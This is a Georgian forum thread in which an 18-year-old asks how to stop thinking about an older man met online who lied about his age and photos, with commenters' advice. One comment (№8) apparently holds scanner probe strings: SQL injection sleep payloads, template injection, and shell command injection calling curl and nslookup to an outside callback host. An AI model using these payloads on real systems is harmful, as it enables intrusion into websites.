შესვლა
რეგისტრაცია
რეკლამა

როცა სხვების რჩევა მნიშვნელოვანია


16-04-2021, 21:21
ავტორი Charlottee
ნანახია 1 944

მოგესალმებით ,ძალიან მჭირდება თქვენი დახმარება! სრულიად უცხო ადამიანების აზრიც კი მაგრძნობინებს, რომ ყველაფერი კარგად შეიძლება იყოს. ფიქრებში ვარ არეული და საშინლად მიჭირს მოვერიო საკუთარ თავს..18 წლის გოგო ვარ.ყველაფერი იმით დაიწყო რომ აბიტურიენტობის დროს ზედმეტმა გადაღლამ და პარალელურმა ზედმეტმა თავისუფალმა დრომ ნაბიჯი გადამადგმევინა და დროის გასაყვანად საიტზე დავრეგისტრირდი.. ახლაც კი მძაგს იმ ყველაფრის გახსენება რააც იქ დამხვდა.. უამმრავიი უცხო ადამიანი სხვადასხვა თემით შემოდის კონტაქტში და უმეტესად საუბარი ინტიმური ხასიათისაა, გაგიმართლებს თუ ვინმე ნორმალურიი იქნება. თავის შესაქცევად დროის გასაყვანად და ა.შ. არ იყო ცუდი საშუალება...რამდენიმე კარგი ადამიანიც გამოჩნდა. ყველაფერი ანონიმური იყო, თუმცა გავიცანი ერთი ბიჭი რომელსაც ენერგეტიკულად ისე გავეხსენი, რომ მთელი ემოციითა და სიხარულით შემეძლო მასთან ყველა თემაზე საუბარი, ჩემს ცხოვრებაში მიმდინარე მოვლენებით დაწყებული საყვარელი საჭმლით დასრულებული და ცოტა ინტიმური თემებიც შიგადაშიგ. ისე მოხდა რომ საბოლოოდ მხოლოდ მას ვწერდი და მისთვის შევდიოდი იმ საიტზე და ყველაფერი 11თვე გაგრძელდა და ახლაც გრძელდება.... ყოველდღიური საუბრები იმდენად მაჩვევდა ამ ადამიანს რომ უკვე ვეღარ შემეძლო დღის გატარება ისე, რომ არ გამხსენებოდა, ახლაც ყოველდღე ვფიქრობ მასზე.. ყოველწამს თუარა და ეს ყველაფერიი ძალიან მტანჯავს, ტოქსიკურობაში გადადის და გული მტკივა რომ ასე ადვილად მივეჩვიე აადამნიანს.. ბოლოს ძალიან დამღალა ამ ანონიმურობამ იმან რომ მუდამ მე ვიყავი ის ვინც გულწრფელი იყო საუბრებში უგზავნიდა ფოტოებს, უყვებოდა რაღაცებს ცხოვრებიდან..ჩაკეტილი არც ის ყოფილა თუმცა უმეტესად საუბარი მაინც ინტიმზე მიდიოდა და შეხვედრის სურვილიც ალბათ ამის გამო იყო გამოწვეული.. მეუბნებოდა რომ 27 წლის იყო ბოლოს მეც ჩავიკეტე.. საბოლოოდ იმდენად დამღალა ამ გაურკვეველმა ურთიერთობამ ადამიანთან რომელსაც არც ვიცნობდი რომ სოციალური ქსელები გავცვალეთ და აღმოჩნდა რომ 33ისაა 27ის ნაცვლად...და არც ის არის ვისი ფოტოც მე ვიცოდი. ამ ყველაფრის შემდეგ მაინც გვაქვს მიმოწერა....წესით ნორმალური ადამიანი რომელსაც ადეკვატური დამოკიდებულებააქვს საკითხებისადმი დაბლოკავს ურთიერთობას და არ მისცემს გასაქანს...მე მეშინია რომ ძალიან არ შევტოპო..მომწონს ადამიანი, მთხოვს შეხვედრას..თუმცა აკვიატებული აზრი არ მასვენებს რომ მხოლოდ ერთობა და არაფერს არ ვნიშნავ მისთვის..არ ვითხოვ არაფერს ადამიანისგან არც ის ანალოგიურად..თუმცა მიუხედავად იმისა რომ საშინლად შევეჩვიე და მიჭირს მისი გონებიდან ამოგდება მაინც ვერ ვბედავ შეხვედრას..არ ვარ მზად ამისთვის.. თუმცა თითქოს არც მინდა დასრულდეს ეს ყველაფერი.. ცოტა არეული ვარ ალბათ არც ნორმალურად გადმოვეცი ჩემი ისტორია თუ სათქმელი..უბრალოდ ასაკობრივი სხვაობაც მააფერხებს, მისი დამოკიდებულებაც.. არმინდა ხორცის ნაჭრად აღმიქვავდეს..არც ის მინდა გამსაჯოთ...უბრალოდ გთხოვთ მითხრათ როგორ მოვახერხო ადამიანის თავიდან ამოგდება და იმის გააზრება, რომ ეს დამოკიდებულება ძალიან ტოქსიკურია და არანაირად არ მომიტანს კარგს. როგორ ივიწყებთ ადამიანებს.. ერთი შეხედვით თითქოს არაფერი.. არც ხელს მიშლის სწავლაში..აბიტურიენტობამ ძალიან კარგად ჩაიარა იქ მოვხვდი სადაც და რაზეც ვოცნებობდი დაფინანასებით ახლაც კარგად ვსწავლობ..თუმცა ამ ფიქრებმა სულ გამომფიტეს, ემოციურად, ფსიქოლოგიურად ფიზიკურად, გამიჩნდა საკუთარი თავის კომპლექსი, მგონია რომ იმის გამო რომ ადამიანს ინტიმურ თემებში გავეხსენი და ამის გამო მივეჩვიე ცუდი ადამიანი ვარ..აქამდე არ მყოლია შეყვარებული, ცალმხრივად შეყვარებული კი ვყოფილვარ:დ სკოლის პერიოდიში ალბათ ამის ბრალია, რომ ასე შევეჩვიე ადამიანს. მაგრამ...ამ დამოკიდებულებას ვერ ვეშვები..არადა როგორი სასაცილოა..ადამიანი არც გყავდეს ნანახი და განიცდიდე უაზროდ..მაგრამ დამიჯერეთ არ მაქვს ადვილი მდგომარეობა..გააზრებული მაქვს ყველაფერი აბსოლიტურად. მაგრამ მინდა ვიპოვო ძალა იმისთვის, რომ გავიაზრო რომ ადამიანის დავიწყებაა საჭირო..მაგრამ ვეერ ვახერხებ..თავს მახსენებს და მწერს რომ უკეთ გასაცნობად კარგია შეხვედრა..თუმცა ის საუბრები მაშინებს..არმინდა მხოლოდ ინტიმური ურთიერთობა იყოს მისი მიზანი..(რაც დიდი ალბათობით მხოლოდ ესარის)...ყველა გარშემო მეუბნება რომ საშიშია ეს ყველაფერი..მაგრამ ჩემს დამოკიდებულებას ვერ ვცვლი..მინდა დამეხმაროთ და მითხრათ რა შეიძლება გავაკეთო... სანამ ბოლომდე გამოვფიტულვარ..არ არის ადვილი ყოველდღე ერთი და იმავე რამეზე ფიქრი...სამწუხაროდ სწავლის და შინაური ცხოველის მოვლის სეირნობის მიუხედავად მაინც მრჩება დრო ვიფიქრო ამ ყველაფერზე და საფუძველიც მაქვს ალბათ .. გულს მტკენს ჩემი გულუბრყვილობა.. რომ ამ ყველაფრის მერე ისევ ყვავილებზე და პეპლებზე ვფიქრობ,,მინდა მითხრათ რაღაც რაც მიწაზე დამიშვებს გაკიცხვის და გულისტკენის გარეშე..ყოველთვის რროცა ვფიქრობ რომ მხოლოდ ერთი მიზანიაქვს..მიისი მონაწწერების გადაკითვის შემდეგ მეფანტება..ისე თბილად მწერს..მაგრამ ეს ხომ არაა ყველაფერი.. შინაგან ეჭვებს რავუყო..ძალიან არ მინდა საკუთარ თავს ცუდი რამ გავუკეთო..გთხოვთ მითხარით რავქნა... არის რაღაცები რასაც ვერ ვუყრი თავს....თუმცა იმედია გამიგებთ და მირჩევთ რამეს...



№1  offline წევრი gogincha

რჩევა ადამიანი რეალურ ცხოვრებაში უნდა გაიცნო, შესაბამისად შეხვდი ნახე და მიხვდები მაგ ადამიანის დამოკიდებულებას შენს მიმართ, ასეგამოგინილი და ვიეტუალური ტიპი მოგწონს და რეაჭურად რომ შეხვდები და პირისპირ რომ მახავ მიხვდები გინდა თი არა მასთამ უეთიერთობა, ის ნუ შეგბოჭავს რომ რომელიღაც საიტზე გაიცანი მერე რა ნორმალური და არანორმალური რეალურ ცხოვრენაშიცა ასე რომ წინ ბევრი საონტერესო ცხოვრება გელოდება არ გამოვა არ მოგეწონება აღმოაჩენ რომ ის არ არის მერე რა ამით არ სრულდება წინ ყველაფერია, ფერადი პოზიტიური და სიცოხლით სავსე ცხოვრება გელოდება რამე თუ არ გამოდის ესეიგი უკეთესი რამ გელოდება წი. წარმტებები

 


№2 სტუმარი სტუმარი მარიამო

უნდა შეხვდე და მერე გადაწყვიტო რას იზამ, გამაგრძობ ურთიერთობას, თუ გაწყვეტ. მადლისა შეხვედრას გთხოვს:)) დამიჯერე უარესი მდგომარეობებიც არსებობს. აი, ის იქნება დიდი პრობლემა, მხოლოდ აქ რომ უნდოდეს ურთიერთობა და შეხვედრაზე უარს ამბობდეს, დამიჯერე:)))

 


№3 სტუმარი ინა

მე იმას გირჩევ მარტო რომ კარგად დაფიქრდე, ღირს თუ არა საერთოდ ეგ ადამიანი ამდენ ნერვიულობად, თუ იმაზე გელაპარაკება მარტო რომ სექსი უნდა ჯობია რო საერთოდ შეწყვიტო მასთან კონტაქტი. 33 წლის კაცი უნდა ხვდებოდეს რო ესეთ პატარა გოგოს არუნდა იყენებდეს, ბოდიში თუ რამე საწყენი ვთქვი, უბრალოდ პატარა ხარ ჯერ და მიხედე კარიერას ცხოვრებაში ყველაფერს მოასწრებ დამიჯერე ????

 


№4  offline წევრი Ronny

ერთი ხელის მოსმით ვერაფერს ამოშლი გონებიდან, მითუმეტეს ადამიანს და უნდა შეეშვა იმის ცდას, იმიტომ რომ ყოველი წარუმატებელი მცდელობის შემდეგ გული გეტკინება. პირადი გამოცდილებიდან გამომდინარე შემიძლია გითხრა, რომ ეტაპობრივად ყველაფერი დალაგდება, მთავარია შენ გაიაზრო რა გინდა და რა გჭირდება ახლა. მისი ნახვა რომ გინდა,მაგრამ უსაფრთხოების გარანტიის არ ქონის გამო თავს იკავებ, ეს ცხადია, ამიტომ ეცადე შენთვის მაქსიმალურად კომფორტულ და უსაფრთხო ადგილას დაუნიშნო შეხვედრა. ვფიქრობ, ეს საუკეთესო გამოსავალია. ვიცი, ძალიან რთულია ასეთ დროს ცივი გონებით მიუდგე საკითხს,მაგრამ შეხვედრისას შეეცადე, რომ თავ-ბრუ არ დაგახვიოს მისმა სიტყვებმა. კარგად დაფიქრდი რა შეიძლება იყოს რეალური მისი ნათქვამიდან და რა გადაჭარბებული. თუ თქვენს შორის ეფექტური კომუნიკაცია შედგება, ეს ძალიან ბევრ რამეს მოჰფენს ნათელს და შენც გულზე მოგეშვება, უკეთესად გააცნობიერებ რა გინდა და რა არა. რაც არ უნდა იყოს, შეხვედრად ღირს, მთავარია არ დაიბნე და თავი დაიცვა, როგორც ფიზიკურად, ისე ფსიქოლოგიურად. სულის დამშვიდებას და სუნთქვისშემკვრელ ბედნიერებას გისურვებ მთელი გულით!!♡

 


№5 სტუმარი ვინმე

თუთქმის ზუსტად ასეთ სიტუაციაში მეც ვიყავი რამდენიმე წლის წინ ამიტომ ძალიან მესმის შენი.

თამბლერზე თითქმის 1 წლიანი მიწერ-მოწერის შემდეგ იმ ადამიანს ძალიან შევეჩვიე
მიუხედავათ იმისა რომ ჩემზე 11 წლით დიდი იყო. თავიდან მეგონა რომ მომწონდა, ყოველ დილით მისი მოწერილი "დილამშვიდობისა" მეცხრე ცაზე მაყენებდა. ყოველდღე ვწერდით ერთმანეთს და ლაპარაკი რათქმაუნდა ინტიმურ საუბარშიც გადაიზარდა. მის სახლში შეხვედრაზეც მივიდა ლაპარაკი, მაგრამ ცოტა არ იყოს შემეშინდა, რადგან იმ პერიოდში შეყვარებული არასდროს არ მყოლია და თან ქალიშვილი ვიყავი. ბოლოს მივხვდი რომ სულ სხვადასხვა სამყაროს მივეკუთვნებოდით და სხვადასხვა რაღაცები გვინდოდა. მე ყურადღება, გულები რომანტიკა. მას სექსი და უბრალოდ განტვირთვა ყველანაირი რომანტიკის გარეშე. ნამდვილად კარგი პიროვნება იყო, მაგრამ ეს ყველაფერი რომ გავიაზრე მივხვდი რომ წინ ვერ წავიდოდით და დაძალებაც არ ღირდა. იმასაც მივხვდი რომ ეს ადამიანი კი არ მომწონდა, უბრალოდ მასზე მიჩვეული და დამოკიდებული ვიყავი, რადგან 1 წლის განმავლობაში დღე არ ჩაგვიგდია რომ არ გველაპარაკა.

ძალიან მესმის შენი. უბრალოდ, შენი სიტუაცია ჩემიდან იმაში განსხვავდება რომ, ადამიანი ვისაც ამდენი ხანი წერდი სულ სხვა აღმოჩნდა. Catfishingს წააგავს ეს ყველაფერი ჩემი აზრით.

განსასჯელი საერთოდ არაფერში არ ხარ და ცუდიც არაფერი გაგიკეთებია, მერწმუნე. მაგრამ დაფიქრდი სანამ რაიმე ნაბიჯს გადადგავ. 33 წლის მამაკაცს საკუთარი ოჯახი თუ არა, რაღაც ფორმის ჩამოყალიბებული ურთიერთობები აუცილებლად ექნება. სხვის ინტრიგაში გახვევა ადვილია მაგრამ გამოძვრომა ძნელი. მაინცდამაინც იმას არ ვამბობ რომ შეიძლება ცოლ-შვილი ყავს, მაგრამ რადგან 18 წლის გოგოთი დაინტერესდა, ძალიან დიდი ალბათობით უფრო ინტიმური ფაქტორი იქნება. მეც ზუსტად ამან დამაფიქრა და ამიტომაც შევწყვიტე მასთან საუბარი.

მიწერას მოვუკელი და ბოლოს თვითონაც აღარ მოიკლა თავი. თავიდან ნამდვილად გამიჭირდა,მენატრებოდა მასთან ლაპარაკი, მაგრამ ახლა აშკარად ვხედავ რომ ასე უკეთესი იყო.

შენც იქნებ უბრალოდ მიეჩვიე მას? თვითონ ადამიანი კი არა, ის აზრი მოგწონს რომ შენითაა დაინტერესებული?

თუ რაიმე ეჭვი გაქვს ამ პიროვნებასთან შედარებით, არ დააიგნორო, ეჭვები ტყუილობრალოდ არ ჩნდება. კარგად დაფიქრდი ღირს თუ არა მასთან რაიმე ურთიერთობის გაგრძელება და შემდეგ იმოქმედე.

წარმატებები და იმედია რაიმე ნომალური მაინც გირჩიე ჩემი ვეფხის ტყაოსნისხელა ნაწერით :დდ

 


№6  offline წევრი გორგოძე

kissing_heart heart_eyes heart_eyes [right][/right] kissing_closed_eyes kissing_closed_eyes

კარგია heart_eyes საინტერესოც
--------------------
ლ.გ

 


№7 სტუმარი სტუმარი სტუმარი

გამარჯობა, ვიცი პასუხს გვიან ვწერ მაგრამ არ შემიძლია რომ რამე არ მოგწერო, მეც მქონდა მსგავსი ურთიერთობა, მაშინ 16 თუ 17 ვიყავი, თავიდან,ძალიან აღფრთოვანებული,არც მახსოვს რამდები წლის იყო მაგრამ ჩემზე დიდი აშკარად, მერე ცოტა ხანძი ისეთი კითხვები დაიწყო რა გაცვია ეხლა და რაღაც ესეთები ხომ ხვდები, კი შემრცხვა მაგრამ მაინც არ შევწყვიტე ურთიერთობა და ორჯერ შევხვდი კიდეც, კოდევ კარგი საერთოდ არ მომეწონა და თანაც დღისით შევხვდი ასე რომ საფრთხე ნაკლები იყო, მეორედ კი ვუთხარი რომ ურთიერთობის გაგრძელება აღარ მინდოდა, არ მეშვებოდა და ბოლოს როგორც იქნა მოვიშორე, მოკლედ ეს ისტორია არც ისე შეესაბამება შენსას რადგან მე ის ასე ძალიან არ მომწონდა მაგრამ, იმის თქმა მინდა რომ ვისაც ვირტუალურად იცნობ ისეთი შეიძლება არ აღმოჩნეს როგორიც გგონია, მესიჯებით ბევრს შეუძლია ძალიან კარგი იყოს, რეალური ცხოვრება კი სულ სხვაა,პირადად მე შეხვედრას არ გირჩევ, საერთოდ ასე ურთიერთობის დაწყება არ ღირს , მით უმეტეს რომ მოტივები აშკარად ჩანს, შეხვდები ისეთ ადამიანს ვინც მარტო სექსის გამო არ მოინდომებს შენთან ურთიერთობას და პატივს გცემს, ასეთები არსებობენ.

 


№8 სტუმარი pHqghUme

1&n981180=v923597

^(#$!@#$)(()))******

1*if(now()=sysdate(),sleep(15),0)

1-1 waitfor delay '0:0:15' --

1K2vWtPw8')) OR 801=(SELECT 801 FROM PG_SLEEP(15))--

response.write(9417943*9823423)

${9999868+9999929}

echo dixzqc$()\ pkuesj\nz^xyu||a #' &echo dixzqc$()\ pkuesj\nz^xyu||a #|" &echo dixzqc$()\ pkuesj\nz^xyu||a #

'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(119).concat(66)+(require'socket'
Socket.gethostbyname('hityx'+'ooapvpkrf8349.bxss.me.')[3].to_s)

;(nslookup -q=cname hittinhhmxucde9faa.bxss.me||curl hittinhhmxucde9faa.bxss.me)|(nslookup -q=cname hittinhhmxucde9faa.bxss.me||curl hittinhhmxucde9faa.bxss.me)&(nslookup -q=cname hittinhhmxucde9faa.bxss.me||curl hittinhhmxucde9faa.bxss.me)

innocent no_mouth neutral_face smiling_imp imp dizzy_face sunglasses mask yum sleepy triumph rage angry tired_face scream astonished joy sob cry persevere cold_sweat fearful confounded disappointed pensive weary disappointed_relieved sweat sweat_smile unamused expressionless hushed confused grimacing open_mouth anguished frowning worried sleeping stuck_out_tongue kissing grinning stuck_out_tongue_closed_eyes stuck_out_tongue_winking_eye wink grin satisfied relieved flushed kissing_closed_eyes kissing_heart heart_eyes smirk relaxed smiley blush laughing smile 1 bowtie qoGZm7Xz' OR 222=(SELECT 222 FROM PG_SLEEP(15))--

 



სახელი: *
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent